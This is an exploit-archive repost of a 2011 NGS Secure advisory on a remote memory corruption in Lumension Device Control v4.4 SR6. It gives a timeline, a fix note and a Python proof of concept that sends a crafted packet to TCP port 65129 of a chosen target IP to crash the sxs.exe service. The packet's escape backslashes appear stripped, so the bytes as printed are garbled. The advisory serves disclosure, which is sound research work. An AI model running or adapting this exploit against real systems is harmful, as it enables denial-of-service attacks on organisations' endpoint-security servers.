Home / exploits Lumension Device Control Memory Corruption
Posted on 26 August 2011
======= Summary ======= Name: Lumension Device Control (formerly Sanctuary) remote memory corruption Release Date: 24 August 2011 Reference: NGS00054 Discoverer: Andy Davis <andy.davis@ngssecure.com> Vendor: Lumension Vendor Reference: Systems Affected: Lumension Device Control v4.4 SR6 Risk: High Status: Published ======== TimeLine ======== Discovered: 3 March 2011 Released: 3 March 2011 Approved: 3 March 2011 Reported: 3 March 2011 Fixed: 24 May 2011 Published: 24 August 2011 =========== Description =========== By sending a specially crafted packet to TCP port 65129 the sxs.exe service running on the Lumension application server terminates ================= Technical Details ================= A simple PoC is presented here: #!/usr/local/bin/python import sys from socket import * import os if (len(sys.argv)!=2): print " --------------------------------------------------" print "Usage: %s <target IP>" % sys.argv[0] print "-------------------------------------------------- " exit(0) host=sys.argv[1] port=65129 packet1 = "xecx02x00x00" #length of remaining packet packet1 += "xc9x00x00x00" #some kind of packet ID? #packet1 += "x18x00x00x00" packet1 += "x61x61x61x61" #crash occurs here packet1 += "xc8x02x00x00xd4xf8x27xe3x51xdfxc9x48x82xc3" packet1 += "xdbx73xbfx42xcex77xecx00x00x00x00x00x00x00x01x00" packet1 += "x00x00x0dxd8x91x32x61xf4x43xa1xe1x8ex27x68x6dxde" packet1 += "xbex1dx00x00x00x00x00x00x00x00x00x00x95x00x05x01" packet1 += "x03x00x00x03x01x10x02x00x00x00x00x00x00x00" packet1 += "x34x2ex34x2ex31x34x35x32" #client version packet1 += "x00x00x00x00x00x00x00x00x00x00" packet1 += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xd6x5e" packet1 += "xe0x81xdbxd8xcbx01xe4x95x45xe1xdbxd8xcbx01x7cx99" packet1 += "x47xbcxdbxd8xcbx01xd6xbcxb0x34xdcxd8xcbx01x02x00" packet1 += "x00x00x9cx47x57x00xd4xf8x27xe3x51xdfxc9x48x82xc3" packet1 += "xdbx73xbfx42xcex77xecx00x00x00x00x00x00x00x00x00" packet1 += "x00x00x00x00x00x00x01x00x00x00" packet1 += "xc0xa8x00x6b" #client IP address packet1 += "xffxffxffx00" #client subnet mask packet1 += "x61x00x63x00x65x00x72x00x2dx00x65x00x38x00" packet1 += "x31x00x37x00x66x00x61x00x65x00x30x00x64x00x38x00" # client hostname packet1 += "x00" * 480 packet1 += "x00x00x40xfcxbax01x00x00x00x00x00x00x00x00x00x80" packet1 += "x85xccx23x00x00x00x80xeex36x00x93x84xdex84x02x00" packet1 += "x00x00x00x00x00x00" s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(packet1) print s.recv(1024) s.close() =============== Fix Information =============== This issue is addressed in SR7, which can be downloaded by registered customers at: https://portal.lumension.com/ NGS Secure Research http://www.ngssecure.com
